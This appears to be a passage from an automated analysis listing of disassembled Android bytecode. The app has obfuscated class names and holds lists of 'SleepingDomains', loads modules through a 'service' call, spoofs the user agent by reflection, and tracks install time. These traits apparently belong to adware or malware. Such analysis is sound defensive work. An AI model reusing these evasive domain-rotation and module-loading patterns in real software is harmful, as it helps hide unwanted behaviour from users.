28invoke-virtual {v1}, Lorg/json/JSONArray;->toString()Ljava/lang/String;
29move-result-object v1
31invoke-interface {v0, v2, v1}, Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String;Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
32move-result-object v0
34invoke-interface {v0}, Landroid/content/SharedPreferences$Editor;->commit()Z
35return-void
Cross References
APIs
  • org.json.JSONArray.<init>
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • org.json.JSONArray.put
  • android.content.SharedPreferences.edit
  • org.json.JSONArray.toString
  • android.content.SharedPreferences$Editor.putString
  • android.content.SharedPreferences$Editor.commit
Strings
  • SleepingDomains
Position Instruction Meta Information
0new-instance v1, Lorg/json/JSONArray;
2invoke-direct {v1}, Lorg/json/JSONArray;-><init>()V
4invoke-interface {p1}, Ljava/util/List;->iterator()Ljava/util/Iterator;
5move-result-object v2
6goto_9:
7invoke-interface {v2}, Ljava/util/Iterator;->hasNext()Z
8move-result v0
9if-eqz v0, :cond_1d
11invoke-interface {v2}, Ljava/util/Iterator;->next()Ljava/lang/Object;
12move-result-object v0
13check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
15invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->DiXsQ()Lorg/json/JSONObject;
16move-result-object v0
18invoke-virtual {v1, v0}, Lorg/json/JSONArray;->put(Ljava/lang/Object;)Lorg/json/JSONArray;
19goto/16 :goto_9
20cond_1d:
21iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;->DiXsQ:Landroid/content/SharedPreferences;
23invoke-interface {v0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
24move-result-object v0
26const-string v2, "SleepingDomains"
28invoke-virtual {v1}, Lorg/json/JSONArray;->toString()Ljava/lang/String;
29move-result-object v1
31invoke-interface {v0, v2, v1}, Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String;Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
32move-result-object v0
34invoke-interface {v0}, Landroid/content/SharedPreferences$Editor;->commit()Z
35return-void
Cross References
APIs
  • org.json.JSONArray.<init>
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • org.json.JSONArray.put
  • android.content.SharedPreferences.edit
  • org.json.JSONArray.toString
  • android.content.SharedPreferences$Editor.putString
  • android.content.SharedPreferences$Editor.apply
Strings
  • sahdhsaheqawvbcvnbzx
Position Instruction Meta Information
0new-instance v1, Lorg/json/JSONArray;
2invoke-direct {v1}, Lorg/json/JSONArray;-><init>()V
4invoke-interface {p1}, Ljava/util/List;->iterator()Ljava/util/Iterator;
5move-result-object v2
6goto_9:
7invoke-interface {v2}, Ljava/util/Iterator;->hasNext()Z
8move-result v0
9if-eqz v0, :cond_19
11invoke-interface {v2}, Ljava/util/Iterator;->next()Ljava/lang/Object;
12move-result-object v0
13check-cast v0, Ljava/lang/Integer;
15invoke-virtual {v1, v0}, Lorg/json/JSONArray;->put(Ljava/lang/Object;)Lorg/json/JSONArray;
16goto/16 :goto_9
17cond_19:
18iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ:Landroid/content/SharedPreferences;
20invoke-interface {v0}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
21move-result-object v0
23const-string v2, "sahdhsaheqawvbcvnbzx"
25invoke-virtual {v1}, Lorg/json/JSONArray;->toString()Ljava/lang/String;
26move-result-object v1
28invoke-interface {v0, v2, v1}, Landroid/content/SharedPreferences$Editor;->putString(Ljava/lang/String;Ljava/lang/String;)Landroid/content/SharedPreferences$Editor;
29move-result-object v0
31invoke-interface {v0}, Landroid/content/SharedPreferences$Editor;->apply()V
32return-void
APIs
  • java.util.ArrayList.<init>
  • java.util.concurrent.ConcurrentHashMap.entrySet
  • java.util.Set.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.util.Map$Entry.getValue
  • java.util.List.add
  • java.lang.Exception.printStackTrace
  • com.czybg.eqtbdmzpklrgyns.uKHWhZbq.<init>
  • android.os.AsyncTask.executeOnExecutor
  • android.os.AsyncTask.execute
Position Instruction Meta Information
0const/4 v8, 0x0
1try_start_1:
2iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
4iget-object v6, v0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->CyGFDR:Lcom/czybg/eqtbdmzpklrgyns/BtXsH;
6iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
7new-instance v7, Ljava/util/ArrayList;
9invoke-direct {v7}, Ljava/util/ArrayList;-><init>()V
11iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->hZyMGHgz:Ljava/util/concurrent/ConcurrentHashMap;
13invoke-virtual {v0}, Ljava/util/concurrent/ConcurrentHashMap;->entrySet()Ljava/util/Set;
14move-result-object v0
16invoke-interface {v0}, Ljava/util/Set;->iterator()Ljava/util/Iterator;
17move-result-object v1
18goto_16:
19invoke-interface {v1}, Ljava/util/Iterator;->hasNext()Z
20move-result v0
21if-eqz v0, :cond_33
23invoke-interface {v1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
24move-result-object v0
25check-cast v0, Ljava/util/Map$Entry;
27invoke-interface {v0}, Ljava/util/Map$Entry;->getValue()Ljava/lang/Object;
28move-result-object v0
30invoke-interface {v7, v0}, Ljava/util/List;->add(Ljava/lang/Object;)Z
31try_end_29: goto/16 :goto_16
32catch_2a: move-exception v0
34iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
35iput-boolean v8, v1, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->phHwgb:Z
37invoke-virtual {v0}, Ljava/lang/Exception;->printStackTrace()V
38goto_32: return-void
39cond_33: new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;
41iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
43iget-object v1, v1, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->jVOak:Landroid/content/Context;
45iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
47iget-object v2, v2, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->LmcGi:Ljava/lang/String;
49iget-object v3, p0, Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
51iget-object v3, v3, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->Odjrct:Ljava/lang/String;
53iget-object v4, p1, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;->DiXsQ:Ljava/lang/String;
54iget v5, p1, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;->Odjrct:I
56invoke-direct/range {v0 .. v5}, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;-><init>(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;I)V
58invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->DiXsQ()Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;
59move-result-object v0
61invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->Odjrct()Lorg/json/JSONObject;
62move-result-object v0
63new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/DIowQgu;
65invoke-direct {v1, p0}, Lcom/czybg/eqtbdmzpklrgyns/DIowQgu;-><init>(Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;)V
66new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/uKHWhZbq;
68invoke-direct {v2, v6, v7, v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/uKHWhZbq;-><init>(Lcom/czybg/eqtbdmzpklrgyns/BtXsH;Ljava/util/List;Lorg/json/JSONObject;Lcom/czybg/eqtbdmzpklrgyns/biaGZ;)V
69sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
70const/16 v1, 0xb
71if-lt v0, v1, :cond_69
73sget-object v0, Landroid/os/AsyncTask;->THREAD_POOL_EXECUTOR:Ljava/util/concurrent/Executor;
74const/4 v1, 0x0
75new-array v1, v1, [Ljava/lang/Void;
77invoke-virtual {v2, v0, v1}, Landroid/os/AsyncTask;->executeOnExecutor(Ljava/util/concurrent/Executor;[Ljava/lang/Object;)Landroid/os/AsyncTask;
78goto/16 :goto_32
79cond_69: const/4 v0, 0x0
80new-array v0, v0, [Ljava/lang/Void;
82invoke-virtual {v2, v0}, Landroid/os/AsyncTask;->execute([Ljava/lang/Object;)Landroid/os/AsyncTask;
83try_end_6f: goto/16 :goto_32
APIs
  • java.lang.Thread.sleep
  • java.lang.Runnable.run
  • java.lang.InterruptedException.printStackTrace
  • android.animation.ValueAnimator.ofFloat
  • android.view.animation.AccelerateDecelerateInterpolator.<init>
  • android.animation.ValueAnimator.setInterpolator
  • android.animation.ValueAnimator.setDuration
  • android.animation.ValueAnimator.addUpdateListener
  • com.czybg.eqtbdmzpklrgyns.ProgressActivity$3.<init>
  • android.animation.ValueAnimator.addListener
  • android.animation.ValueAnimator.start
Position Instruction Meta Information
0.param p1, "duration" # J
1.param p3, "finishCallback" # Ljava/lang/Runnable;
2.prologue
3sget v2, Landroid/os/Build$VERSION;->SDK_INT:I
4const/16 v3, 0xb
5if-ge v2, v3, :cond_14
6const-wide/16 v2, 0xbb8
7try_start_8:
8invoke-static {v2, v3}, Ljava/lang/Thread;->sleep(J)V
9goto_b:
10invoke-interface {p3}, Ljava/lang/Runnable;->run()V
11goto_e: return-void
12catch_f: move-exception v1
14invoke-virtual {v1}, Ljava/lang/InterruptedException;->printStackTrace()V
15goto/16 :goto_b
16cond_14: const/4 v2, 0x2
17new-array v2, v2, [F
18fill-array-data v2, :array_3e
20invoke-static {v2}, Landroid/animation/ValueAnimator;->ofFloat([F)Landroid/animation/ValueAnimator;
21move-result-object v0
22new-instance v2, Landroid/view/animation/AccelerateDecelerateInterpolator;
24invoke-direct {v2}, Landroid/view/animation/AccelerateDecelerateInterpolator;-><init>()V
26invoke-virtual {v0, v2}, Landroid/animation/ValueAnimator;->setInterpolator(Landroid/animation/TimeInterpolator;)V
28invoke-virtual {v0, p1, p2}, Landroid/animation/ValueAnimator;->setDuration(J)Landroid/animation/ValueAnimator;
29new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity$2;
31invoke-direct {v2, p0}, Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity$2;-><init>(Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity;)V
33invoke-virtual {v0, v2}, Landroid/animation/ValueAnimator;->addUpdateListener(Landroid/animation/ValueAnimator$AnimatorUpdateListener;)V
34new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity$3;
36invoke-direct {v2, p0, p3}, Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity$3;-><init>(Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity;Ljava/lang/Runnable;)V
38invoke-virtual {v0, v2}, Landroid/animation/ValueAnimator;->addListener(Landroid/animation/Animator$AnimatorListener;)V
40invoke-virtual {v0}, Landroid/animation/ValueAnimator;->start()V
41goto/16 :goto_e
42nop
Cross References
APIs
  • java.util.ArrayList.<init>
  • android.util.Pair.<init>
  • java.util.ArrayList.add
  • android.util.Pair.<init>
  • java.util.ArrayList.add
  • java.util.Collections.addAll
  • android.util.Pair.<init>
  • java.util.ArrayList.add
Strings
  • service
Position Instruction Meta Information
0new-instance v0, Ljava/util/ArrayList;
2invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
3new-instance v1, Landroid/util/Pair;
4const-class v2, Landroid/content/Context;
6invoke-direct {v1, v2, p1}, Landroid/util/Pair;-><init>(Ljava/lang/Object;Ljava/lang/Object;)V
8invoke-virtual {v0, v1}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
9new-instance v1, Landroid/util/Pair;
10const-class v2, Ljava/lang/Object;
11new-instance v3, Lcom/czybg/eqtbdmzpklrgyns/Module$Api;
13invoke-direct {v3, p0}, Lcom/czybg/eqtbdmzpklrgyns/Module$Api;-><init>(Lcom/czybg/eqtbdmzpklrgyns/Module;)V
15invoke-direct {v1, v2, v3}, Landroid/util/Pair;-><init>(Ljava/lang/Object;Ljava/lang/Object;)V
17invoke-virtual {v0, v1}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
19invoke-static {v0, p2}, Ljava/util/Collections;->addAll(Ljava/util/Collection;[Ljava/lang/Object;)Z
20new-instance v1, Landroid/util/Pair;
21const-class v2, Ljava/lang/String;
23iget-object v3, p0, Lcom/czybg/eqtbdmzpklrgyns/Module;->info:Lcom/czybg/eqtbdmzpklrgyns/qaNho;
25iget-object v3, v3, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->hZyMGHgz:Ljava/lang/String;
27invoke-direct {v1, v2, v3}, Landroid/util/Pair;-><init>(Ljava/lang/Object;Ljava/lang/Object;)V
29invoke-virtual {v0, v1}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
30new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/fQuMyR;
32const-string v2, "service"
34invoke-virtual {p0, v2, v0}, Lcom/czybg/eqtbdmzpklrgyns/Module;->DiXsQ(Ljava/lang/String;Ljava/util/ArrayList;)Ljava/lang/Object;
35move-result-object v0
37invoke-direct {v1, p0, v0}, Lcom/czybg/eqtbdmzpklrgyns/fQuMyR;-><init>(Lcom/czybg/eqtbdmzpklrgyns/Module;Ljava/lang/Object;)V
38return-object v1
Cross References
APIs
  • org.json.JSONObject.<init>
  • org.json.JSONObject.put
Strings
  • domain
  • enableTime
  • isActive
  • isBuildIn
Position Instruction Meta Information
0new-instance v0, Lorg/json/JSONObject;
2invoke-direct {v0}, Lorg/json/JSONObject;-><init>()V
3try_start_5:
4const-string v1, "domain"
6iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->DiXsQ:Ljava/lang/String;
8invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
10const-string v1, "enableTime"
11iget-wide v2, p0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->Odjrct:J
13invoke-virtual {v0, v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;J)Lorg/json/JSONObject;
15const-string v1, "isActive"
16iget-boolean v2, p0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->LmcGi:Z
18invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
20const-string v1, "isBuildIn"
21iget-boolean v2, p0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;->hZyMGHgz:Z
23invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
24goto_21: return-object v0
25catch_22: move-exception v1
26goto/16 :goto_21
Cross References
APIs
  • java.util.concurrent.ConcurrentHashMap.entrySet
  • java.util.Set.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.util.Map$Entry.getValue
  • java.lang.Integer.valueOf
  • java.util.concurrent.ConcurrentHashMap.containsKey
  • java.lang.Integer.valueOf
  • java.util.concurrent.ConcurrentHashMap.get
  • android.os.Handler.removeCallbacksAndMessages
Position Instruction Meta Information
0const/4 v0, 0x0
1iput-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->DiXsQ:Z
3iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->hZyMGHgz:Ljava/util/concurrent/ConcurrentHashMap;
5invoke-virtual {v0}, Ljava/util/concurrent/ConcurrentHashMap;->entrySet()Ljava/util/Set;
6move-result-object v0
8invoke-interface {v0}, Ljava/util/Set;->iterator()Ljava/util/Iterator;
9move-result-object v2
10goto_d:
11invoke-interface {v2}, Ljava/util/Iterator;->hasNext()Z
12move-result v0
13if-eqz v0, :cond_4a
15invoke-interface {v2}, Ljava/util/Iterator;->next()Ljava/lang/Object;
16move-result-object v0
17check-cast v0, Ljava/util/Map$Entry;
19invoke-interface {v0}, Ljava/util/Map$Entry;->getValue()Ljava/lang/Object;
20move-result-object v0
21check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/Module;
23iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->DoHnmwOG:Ljava/util/concurrent/ConcurrentHashMap;
25iget-object v3, v0, Lcom/czybg/eqtbdmzpklrgyns/Module;->info:Lcom/czybg/eqtbdmzpklrgyns/qaNho;
26iget v3, v3, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->DiXsQ:I
28invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
29move-result-object v3
31invoke-virtual {v1, v3}, Ljava/util/concurrent/ConcurrentHashMap;->containsKey(Ljava/lang/Object;)Z
32move-result v1
33if-eqz v1, :cond_d
35iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->DoHnmwOG:Ljava/util/concurrent/ConcurrentHashMap;
37iget-object v3, v0, Lcom/czybg/eqtbdmzpklrgyns/Module;->info:Lcom/czybg/eqtbdmzpklrgyns/qaNho;
38iget v3, v3, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->DiXsQ:I
40invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
41move-result-object v3
43invoke-virtual {v1, v3}, Ljava/util/concurrent/ConcurrentHashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
44move-result-object v1
45check-cast v1, Lcom/czybg/eqtbdmzpklrgyns/fQuMyR;
46if-eqz v1, :cond_d
47try_start_41:
48invoke-virtual {v1}, Lcom/czybg/eqtbdmzpklrgyns/fQuMyR;->DiXsQ()V
49try_end_44: goto/16 :goto_d
50catch_45: move-exception v1
52invoke-virtual {p0, v0}, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/Module;)V
53goto/16 :goto_d
54cond_4a:
55iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->IwTvjRW:Landroid/os/Handler;
56const/4 v1, 0x0
58invoke-virtual {v0, v1}, Landroid/os/Handler;->removeCallbacksAndMessages(Ljava/lang/Object;)V
59return-void
Cross References
APIs
  • android.webkit.WebSettings.getDefaultUserAgent
  • java.lang.Class.getDeclaredConstructor
  • java.lang.reflect.Constructor.setAccessible
  • java.lang.reflect.Constructor.newInstance
  • android.webkit.WebSettings.getUserAgentString
  • java.lang.reflect.Constructor.setAccessible
  • android.webkit.WebView.<init>
  • android.webkit.WebView.getSettings
  • android.webkit.WebSettings.getUserAgentString
  • java.lang.reflect.Constructor.setAccessible
Position Instruction Meta Information
0sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
1const/16 v1, 0x11
2if-lt v0, v1, :cond_b
4invoke-static {p0}, Landroid/webkit/WebSettings;->getDefaultUserAgent(Landroid/content/Context;)Ljava/lang/String;
5move-result-object v0
6goto_a: return-object v0
7cond_b: const-class v0, Landroid/webkit/WebSettings;
8const/4 v1, 0x2
9new-array v1, v1, [Ljava/lang/Class;
10const/4 v2, 0x0
11const-class v3, Landroid/content/Context;
12aput-object v3, v1, v2
13const/4 v2, 0x1
14const-class v3, Landroid/webkit/WebView;
15aput-object v3, v1, v2
17invoke-virtual {v0, v1}, Ljava/lang/Class;->getDeclaredConstructor([Ljava/lang/Class;)Ljava/lang/reflect/Constructor;
18move-result-object v1
19const/4 v0, 0x1
21invoke-virtual {v1, v0}, Ljava/lang/reflect/Constructor;->setAccessible(Z)V
22try_end_22: const/4 v0, 0x2
23try_start_23: new-array v0, v0, [Ljava/lang/Object;
24const/4 v2, 0x0
25aput-object p0, v0, v2
26const/4 v2, 0x1
27const/4 v3, 0x0
28aput-object v3, v0, v2
30invoke-virtual {v1, v0}, Ljava/lang/reflect/Constructor;->newInstance([Ljava/lang/Object;)Ljava/lang/Object;
31move-result-object v0
32check-cast v0, Landroid/webkit/WebSettings;
34invoke-virtual {v0}, Landroid/webkit/WebSettings;->getUserAgentString()Ljava/lang/String;
35try_end_35: move-result-object v0
36const/4 v2, 0x0
37try_start_37:
38invoke-virtual {v1, v2}, Ljava/lang/reflect/Constructor;->setAccessible(Z)V
39try_end_3a: goto/16 :goto_a
40catch_3b: move-exception v0
41new-instance v0, Landroid/webkit/WebView;
43invoke-direct {v0, p0}, Landroid/webkit/WebView;-><init>(Landroid/content/Context;)V
45invoke-virtual {v0}, Landroid/webkit/WebView;->getSettings()Landroid/webkit/WebSettings;
46move-result-object v0
48invoke-virtual {v0}, Landroid/webkit/WebSettings;->getUserAgentString()Ljava/lang/String;
49move-result-object v0
50goto/16 :goto_a
51catchall_4a: move-exception v0
52const/4 v2, 0x0
53try_start_4c:
54invoke-virtual {v1, v2}, Ljava/lang/reflect/Constructor;->setAccessible(Z)V
55throw v0
Cross References
APIs
  • java.net.URLConnection.getInputStream
  • java.net.URLConnection.getHeaderField
  • android.text.TextUtils.equals
  • java.io.ByteArrayOutputStream.<init>
  • java.io.ByteArrayOutputStream.toByteArray
  • java.io.ByteArrayOutputStream.write
Strings
  • Content-Encoding
  • gzip
Position Instruction Meta Information
1invoke-virtual {p0}, Ljava/net/URLConnection;->getInputStream()Ljava/io/InputStream;
2move-result-object v0
4invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/hZyMGHgz;->DiXsQ(Ljava/io/InputStream;)Ljava/io/ByteArrayOutputStream;
5move-result-object v1
7const-string v0, "Content-Encoding"
9invoke-virtual {p0, v0}, Ljava/net/URLConnection;->getHeaderField(Ljava/lang/String;)Ljava/lang/String;
10move-result-object v0
12const-string v2, "gzip"
14invoke-static {v0, v2}, Landroid/text/TextUtils;->equals(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Z
15move-result v0
16if-eqz v0, :cond_27
17new-instance v0, Ljava/io/ByteArrayOutputStream;
19invoke-direct {v0}, Ljava/io/ByteArrayOutputStream;-><init>()V
21invoke-static {v1}, Lcom/czybg/eqtbdmzpklrgyns/Odjrct;->Odjrct(Ljava/io/ByteArrayOutputStream;)Ljava/io/ByteArrayOutputStream;
22move-result-object v1
24invoke-virtual {v1}, Ljava/io/ByteArrayOutputStream;->toByteArray()[B
25move-result-object v1
27invoke-virtual {v0, v1}, Ljava/io/ByteArrayOutputStream;->write([B)V
28goto_26: return-object v0
29cond_27: move-object v0, v1
30goto/16 :goto_26
Cross References
APIs
  • android.content.Context.getSharedPreferences
  • android.content.SharedPreferences.getLong
  • java.lang.System.currentTimeMillis
  • android.content.SharedPreferences.edit
  • android.content.SharedPreferences$Editor.putLong
  • android.content.SharedPreferences$Editor.commit
Strings
  • informator
  • install_time
Position Instruction Meta Information
0const-wide/16 v3, 0x0
2const-string v0, "informator"
3const/4 v1, 0x0
5invoke-virtual {p0, v0, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
6move-result-object v2
8const-string v0, "install_time"
10invoke-interface {v2, v0, v3, v4}, Landroid/content/SharedPreferences;->getLong(Ljava/lang/String;J)J
11move-result-wide v0
12cmp-long v3, v0, v3
13if-nez v3, :cond_27
15invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
16move-result-wide v0
17const-wide/16 v3, 0x3e8
18div-long/2addr v0, v3
20invoke-interface {v2}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;
21move-result-object v2
23const-string v3, "install_time"
25invoke-interface {v2, v3, v0, v1}, Landroid/content/SharedPreferences$Editor;->putLong(Ljava/lang/String;J)Landroid/content/SharedPreferences$Editor;
26move-result-object v2
28invoke-interface {v2}, Landroid/content/SharedPreferences$Editor;->commit()Z
29cond_27: long-to-int v0, v0
30return v0
APIs
  • com.czybg.eqtbdmzpklrgyns.idfkrS.onCreate
  • com.czybg.eqtbdmzpklrgyns.FooVJESlkd1K.getIntent
  • android.content.Intent.getBooleanExtra
  • com.czybg.eqtbdmzpklrgyns.FooVJESlkd1K.finish
  • com.czybg.eqtbdmzpklrgyns.FooVJESlkd1K.getIntent
  • android.content.Intent.getSerializableExtra
Strings
  • exit
  • computer
Position Instruction Meta Information
1invoke-super {p0, p1}, Lcom/czybg/eqtbdmzpklrgyns/idfkrS;->onCreate(Landroid/os/Bundle;)V
3invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/FooVJESlkd1K;->getIntent()Landroid/content/Intent;
4move-result-object v0
6const-string v1, "exit"
7const/4 v2, 0x0
9invoke-virtual {v0, v1, v2}, Landroid/content/Intent;->getBooleanExtra(Ljava/lang/String;Z)Z
10move-result v0
11if-eqz v0, :cond_14
13invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/FooVJESlkd1K;->finish()V
14goto_13: return-void
15cond_14:
16invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/FooVJESlkd1K;->getIntent()Landroid/content/Intent;
17move-result-object v0
19const-string v1, "computer"
21invoke-virtual {v0, v1}, Landroid/content/Intent;->getSerializableExtra(Ljava/lang/String;)Ljava/io/Serializable;
22move-result-object v0
23check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/CyGFDR;
24iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/FooVJESlkd1K;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/CyGFDR;
26iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/FooVJESlkd1K;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/CyGFDR;
28invoke-interface {v0, p0}, Lcom/czybg/eqtbdmzpklrgyns/CyGFDR;->DiXsQ(Landroid/app/Activity;)V
29goto/16 :goto_13
Cross References
APIs
  • org.json.JSONObject.getString
  • org.json.JSONObject.optLong
  • org.json.JSONObject.optBoolean
Strings
  • domain
  • enableTime
  • isActive
  • isBuildIn
Position Instruction Meta Information
0try_start_0:
1const-string v0, "domain"
3invoke-virtual {p0, v0}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
4move-result-object v1
6const-string v0, "enableTime"
7const-wide/16 v2, 0x0
9invoke-virtual {p0, v0, v2, v3}, Lorg/json/JSONObject;->optLong(Ljava/lang/String;J)J
10move-result-wide v2
12const-string v0, "isActive"
13const/4 v4, 0x0
15invoke-virtual {p0, v0, v4}, Lorg/json/JSONObject;->optBoolean(Ljava/lang/String;Z)Z
16move-result v4
18const-string v0, "isBuildIn"
19const/4 v5, 0x0
21invoke-virtual {p0, v0, v5}, Lorg/json/JSONObject;->optBoolean(Ljava/lang/String;Z)Z
22move-result v5
23new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
25invoke-direct/range {v0 .. v5}, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;-><init>(Ljava/lang/String;JZZ)V
26goto_21: return-object v0
27catch_22: move-exception v0
28const/4 v0, 0x0
29goto/16 :goto_21
Cross References
APIs
  • java.lang.Object.<init>
  • java.lang.StringBuilder.<init>
  • android.content.Context.getPackageName
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • android.content.Context.getSharedPreferences
Strings
  • dmnkpr
Position Instruction Meta Information
0iput-object p1, p0, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;->Odjrct:Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;
2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
3new-instance v0, Ljava/lang/StringBuilder;
5invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
7invoke-virtual {p2}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
8move-result-object v1
10invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
11move-result-object v0
13const-string v1, "dmnkpr"
15invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
16move-result-object v0
18invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
19move-result-object v0
20const/4 v1, 0x0
22invoke-virtual {p2, v0, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
23move-result-object v0
24iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/ciatqPxI;->DiXsQ:Landroid/content/SharedPreferences;
25return-void
Cross References
APIs
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.lang.String.equals
  • java.lang.System.currentTimeMillis
Position Instruction Meta Information
1sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->LmcGi:Ljava/util/List;
3invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
4move-result-object v1
5goto_6:
6invoke-interface {v1}, Ljava/util/Iterator;->hasNext()Z
7move-result v0
8if-eqz v0, :cond_1a
10invoke-interface {v1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
11move-result-object v0
12check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/TikzFyJI;
